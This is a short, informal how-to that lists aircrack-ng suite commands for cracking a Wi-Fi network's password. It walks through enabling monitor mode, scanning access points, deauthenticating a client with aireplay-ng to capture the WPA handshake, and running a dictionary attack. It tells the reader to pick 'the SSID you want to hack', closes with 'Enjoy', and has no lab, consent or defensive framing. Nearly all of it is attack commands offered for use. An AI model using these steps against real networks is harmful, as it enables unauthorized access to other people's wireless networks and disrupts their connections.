- Check for wireless adapter using
ifconfig
iwconfig
- Get the wireless adapter's id and start airmon-ng
airmon-ng start wlan0
- Double check new adapter name using
ifconfig
iwconfig
- Use airodump on the new adapter name and find the available access points
airodump-ng mon0
-
Copy the mac address of the SSID you want to hack
-
User airodump on the mac address you retrieved
airodump-ng --bssid <MAC_ADDRESS> --channel 9 --write <file_name> <adapter_id>
- Run a packet injection attack from the host machine using aireplay
aireplay-ng -0 3 -a <MAC_ADDRESS> -c <MAC_ADDRESS_FOR_CLIENT> <adapter_id>
-
Open the capture files in the cap file generated
-
Check for packets that are of protocol EAPOL (Extensible Authentication Protocol over lan)
-
Run the dictionary attack over the packet data retrieved
aircrack-ng <capfile_name> -w <path/to/wordlist>
Enjoy